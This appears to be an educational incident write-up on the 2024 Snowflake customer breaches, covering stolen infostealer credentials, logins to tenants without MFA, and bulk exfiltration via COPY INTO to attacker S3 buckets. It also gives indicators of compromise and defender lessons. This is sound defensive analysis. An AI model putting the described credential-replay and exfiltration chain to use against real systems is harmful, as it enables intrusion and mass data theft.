Decipher File · May 2024 to August 2024

Snowflake Breaches 2024: Ticketmaster, AT&T, Santander Hit via Customer-Side Credentials

The 2024 Snowflake customer breaches are the cybersecurity case study that proved cloud data warehouse security depends on customer-side identity hygiene, not vendor controls. Between May and August 2024, threat group UNC5537 used credentials stolen by infostealer malware on customer endpoints to access Snowflake tenants that lacked MFA. Mandiant attributed at least 165 victim notifications, including Ticketmaster, AT&T, Santander, Advance Auto Parts, Pure Storage, and Neiman Marcus. AT&T disclosed paying approximately $370,000 in ransom.

By·Published May 18, 2026·Last verified May 2026

MITRE ATT&CK techniques

T1078.004 Valid Accounts: Cloud Accounts T1555.003 Credentials from Password Stores: Credentials from Web Browsers T1539 Steal Web Session Cookie T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Incident summary

Snowflake is the cloud data warehouse used by thousands of enterprises to centralize analytics data. Tenants typically hold customer records, billing data, telemetry, and partner data, often the most sensitive structured data an organization owns. In 2024, threat group UNC5537 (Mandiant designation) ran a credential-replay campaign against Snowflake customer tenants. Per Mandiant's June 10, 2024 advisory, the campaign reached at least 165 customer tenants between May and August 2024 and produced public breach disclosures from Ticketmaster, AT&T, Santander, Advance Auto Parts, Pure Storage, Neiman Marcus, Lending Tree, Anheuser-Busch, and others.

The root cause was not a Snowflake platform vulnerability. Per Snowflake CISO Brad Jones' joint statement with Mandiant and CrowdStrike on June 2, 2024, the threat actor used valid customer credentials obtained from infostealer malware logs (LUMMA, RACOON, REDLINE, VIDAR) on contractor and developer endpoints, some dating to 2020. The compromised Snowflake user accounts did not have multi-factor authentication enforced. Snowflake's authentication model at the time defaulted to single-factor and required tenant admins to opt in to MFA.

Ticketmaster's parent company Live Nation disclosed in a May 31, 2024 SEC Form 8-K that approximately 560 million customer records were exfiltrated. AT&T disclosed on July 12, 2024 that call detail records for nearly all wireless customers between May 2022 and October 2022 plus a portion of January 2023 had been exfiltrated. Per Wired's July 14 reporting, AT&T paid the threat actor approximately $370,000 in Bitcoin to delete the stolen data.

Attack technique

MITRE ATT&CK maps the campaign primarily to T1078.004 (Valid Accounts: Cloud Accounts), with T1555.003 (Credentials from Password Stores: Credentials from Web Browsers) and T1539 (Steal Web Session Cookie) covering the upstream infostealer collection, and T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage) covering the bulk-unload behavior. The technique chain is straightforward: harvest credentials from victim endpoints via commodity infostealer malware, identify Snowflake URLs in the harvested credential logs, attempt login at scale against tenants without MFA, and exfiltrate data via Snowflake's own COPY INTO command to attacker-controlled S3 buckets.

Per Mandiant, UNC5537 used a custom utility variously named rapeflake or FROSTBITE for Snowflake-specific reconnaissance. The utility enumerated databases, schemas, and tables, queried row counts to identify high-value targets, and staged the COPY INTO commands. The actor staged exfiltration to external S3 buckets via Snowflake's own data unloading mechanism, which made the egress look like a normal Snowflake operation from the platform's perspective.

Infostealer marketplaces are the structural enabler. Per multiple Mandiant and CrowdStrike reports, credentials harvested by LUMMA, RACOON, REDLINE, and VIDAR are sold in bulk on Telegram channels and Russian-language forums for $10 to $100 per log depending on the targeted victim. The Snowflake campaign demonstrates how a non-glamorous commodity malware marketplace produces nation-state-grade outcomes when combined with SaaS tenants that do not enforce MFA. The campaign produced no zero-day, no novel malware, no advanced TTPs — only credential reuse against unenforced controls.

Snowflake responded operationally with the June 7, 2024 release of a network policy feature that lets tenant admins enforce IP allowlisting for user authentication and the July 17, 2024 announcement of mandatory MFA for human user accounts in new Snowflake editions. Snowflake also enabled tenant-level alerts for anomalous data egress and improved its CISO portal incident communications. Snowflake's stock traded down approximately 6 percent on June 3, 2024 after the initial customer notifications became public.

Impact and consequences

The Ticketmaster breach is the largest publicly disclosed by record count. Per Live Nation's May 31, 2024 SEC Form 8-K and follow-up notifications, approximately 560 million customer records were exfiltrated, including names, addresses, email addresses, partial payment card data, and order history. ShinyHunters posted the dataset for sale at $500,000 on BreachForums on May 27, 2024. Multiple class-action lawsuits followed in US federal court.

AT&T's disclosure was the most operationally damaging by data sensitivity. Per the July 12, 2024 8-K, the breach exposed call detail records (CDRs) including the phone numbers called and call duration for nearly all AT&T wireless customers during the affected window. The records did not include call content or SMS message text. Wired reported on July 14, 2024 that AT&T paid the threat actor approximately $370,000 in Bitcoin to delete the stolen data, a payment routed through ShinyHunters intermediary John Erin Binns. The FBI was involved in the negotiation.

Santander's May 14, 2024 disclosure covered approximately 30 million customers and employees in Spain, Chile, and Uruguay. Advance Auto Parts disclosed approximately 2.3 million current and former employee records affected. Pure Storage confirmed the compromise of a workspace within its Snowflake tenant but reported that the affected workspace contained only telemetry, not customer data. Neiman Marcus disclosed approximately 31 million customer records affected.

The regulatory consequences for Snowflake itself were limited because the root cause was customer-side credential hygiene, not a Snowflake platform vulnerability. The reputational consequence was more meaningful. Snowflake's shared-responsibility position — that customers are responsible for their own credential hygiene and MFA enforcement — was widely critiqued in trade press as failing the test of secure defaults. Snowflake's commitment to mandatory MFA for new tenants in July 2024 was a direct response to that critique. The campaign also accelerated Salesforce, Microsoft, and Workday efforts to flip their authentication defaults from opt-in MFA to default-on MFA across their respective platforms through late 2024 and into 2025.

Indicators of Compromise

Specific artifacts defenders should hunt for. Cross-reference these against your existing detection rules before acting on them.

› Tenant access from infostealer-associated IP infrastructure including residential proxy ranges flagged by Mandiant in the June 10, 2024 advisory
› Use of the rapeflake utility (also tracked as FROSTBITE) for Snowflake reconnaissance and data staging
› Account login by user identities present in LUMMA, RACOON, and REDLINE infostealer logs from 2020 onward
› Bulk COPY INTO or unloading queries to external stages on S3 buckets owned by the attacker
› Absence of multi-factor authentication on the compromised Snowflake user accounts
› Original credential capture from contractor and developer endpoints, not from production Snowflake admin endpoints
› Tenant access patterns consistent with brute attempt + valid credential reuse across 165+ tenants in the same campaign window

Lessons for defenders

Treat shared-responsibility lines on SaaS platforms as defaults you have to override. Snowflake's pre-July 2024 default was single-factor authentication unless the tenant admin enabled MFA. That default produced the breach. Every SaaS platform you depend on has a similar set of opt-in security controls. Audit them. Enable MFA, IP allowlisting, session timeouts, and anomaly alerting on every tenant. Document those settings in your tenant baseline configuration the same way you document Active Directory baselines.

Infostealer logs are now a tier-one threat intelligence source. Mature security teams subscribe to infostealer log monitoring services that match your domains and email addresses against credentials posted on Telegram and Russian-language forums. If your domains appear in fresh logs, treat it as a credential compromise on the listed user and force a password reset plus MFA re-enrollment immediately, regardless of whether the user has logged in from the suspicious endpoint.

Endpoint controls on contractor and developer machines determine your SaaS perimeter. Per Mandiant, several of the compromised Snowflake credentials originated on contractor or personal endpoints that were not managed by the victim organization's EDR. Bring-your-own-device or unmanaged contractor laptop access to high-value SaaS tenants is the structural risk. Enforce managed-device-only access to sensitive SaaS through conditional access policies tied to device posture, or terminate the access path.

Egress controls on data warehouses are a primary control, not a secondary one. The UNC5537 campaign used Snowflake's own COPY INTO command to exfiltrate data to attacker-controlled S3 buckets. Tenant-level controls that restrict data unloading to specific allowlisted external stages defeat that exfiltration path. Configure those controls before you need them. Snowflake's network policy and external stage allowlist are the specific features to enable.

Related career roles

The cybersecurity professionals whose day-to-day work would have detected, investigated, or contained this incident.

Related Decipher Files

Tracking AI-system incidents and policy events? Browse Applied AI Decipher Files →

Frequently asked questions

Who was behind the 2024 Snowflake customer breaches?

Per Mandiant's June 10, 2024 advisory, the campaign was operated by a threat group tracked as UNC5537. The group used credentials harvested from commodity infostealer malware (LUMMA, RACOON, REDLINE, VIDAR) on customer endpoints, some dating back to 2020. ShinyHunters served as an intermediary for stolen data sales on BreachForums. The campaign produced no zero-day exploit. The structural enabler was tenant-level absence of MFA.

Was Snowflake itself breached in 2024?

No. Per Snowflake CISO Brad Jones' June 2, 2024 joint statement with Mandiant and CrowdStrike, no Snowflake platform vulnerability was identified or exploited. The campaign used valid customer credentials against customer tenants that did not have MFA enforced. The root cause sat on the customer side of the shared responsibility line. Snowflake responded with mandatory MFA defaults for new tenants in July 2024.

What did Ticketmaster lose in the 2024 Snowflake breach?

Per Live Nation Entertainment's May 31, 2024 SEC Form 8-K filing, approximately 560 million customer records were exfiltrated, including names, addresses, email addresses, partial payment card data, and order history. ShinyHunters posted the dataset for sale at $500,000 on BreachForums on May 27, 2024. Multiple class-action lawsuits followed in US federal court.

Did AT&T pay a ransom in the Snowflake-linked breach?

Yes. Per Wired's July 14, 2024 reporting and corroborating reporting in 404 Media, AT&T paid the threat actor approximately $370,000 in Bitcoin to delete the stolen call detail records dataset. The payment was routed through ShinyHunters intermediary John Erin Binns. The FBI was involved in the negotiation. AT&T's July 12, 2024 SEC Form 8-K disclosure confirmed the breach and the affected data scope but did not disclose the ransom payment.

What data did AT&T lose in the Snowflake breach?

Per AT&T's July 12, 2024 SEC disclosure, call detail records for nearly all AT&T wireless customers between May 2022 and October 2022, plus a portion of January 2023, were exfiltrated. The records included the phone numbers called and call duration but did not include call content or SMS message text. The records did include enough metadata to map social and professional networks of AT&T customers, which raised concerns for journalists, officials, and other sensitive populations.

How can defenders prevent a Snowflake-style SaaS credential breach?

Enforce mandatory MFA on every SaaS tenant. Enable IP allowlisting and conditional access policies that restrict access to managed devices. Subscribe to infostealer log monitoring and force credential rotation when domains appear in fresh logs. Configure data egress controls (external stage allowlists in Snowflake's case) before they are needed. Treat unmanaged contractor and BYOD access to high-value SaaS as a structural risk, not a procurement convenience.

Sources

Mandiant: UNC5537 Targets Snowflake Customer Instances · Mandiant's June 10, 2024 advisory with attribution, technique chain, and victim count
Snowflake: Detecting and Preventing Unauthorized User Access · Snowflake CISO Brad Jones' joint statement with Mandiant and CrowdStrike on the campaign
AT&T Form 8-K (July 12, 2024) · AT&T SEC disclosure of the call-detail-records breach attributed to the Snowflake campaign
CISA Alert: Snowflake Customer Account Targeting · CISA's June 3, 2024 alert echoing Snowflake guidance on MFA and network policies
Ticketmaster Parent Live Nation Form 8-K (May 31, 2024) · Live Nation SEC disclosure of the Ticketmaster customer database breach
Wired: AT&T Paid a Hacker $370,000 to Delete Stolen Phone Records · Wired's July 14, 2024 reporting on the AT&T ransom payment

DecipherU is not affiliated with, endorsed by, or sponsored by any company listed in this directory. Information compiled from publicly available sources for educational purposes.

Last verified: 2026-05-18?Report an inaccuracy

This role lives inside a packaged path

Want the curriculum, comp delta, and recommended courses for this role?

DecipherU bundles cybersecurity roles into a small set of packaged paths. Each path has the curriculum sequence, the compensation delta it unlocks, and the recommended courses, all pre-set. Two ways in:

Take the 2-min Risk Score →Open the cybersecurity path hub →

Where to go next

Three next steps depending on where you are. The first two are free.

Free · 2 minutes

Start with the AI Risk Score

Two minutes. Tells you how exposed your current role is to AI automation and which defensive moves carry the best return.

Start the AI Risk Score →

Paid program · $147-$597

Aligned course: SOC Analyst Fundamentals

Capstone reviewed by the founder, published rubric, Ed25519-signed verifiable credential on completion.

View the course →

Free account

Save your results and track progress

A free account stores your assessments, recommendations, and an exportable copy of your Career DNA. No card needed.

Create your account →

Get cybersecurity career insights delivered weekly

Join cybersecurity professionals receiving weekly intelligence on threats, job market trends, salary data, and career growth strategies.

By subscribing you agree to our privacy policy. Unsubscribe anytime.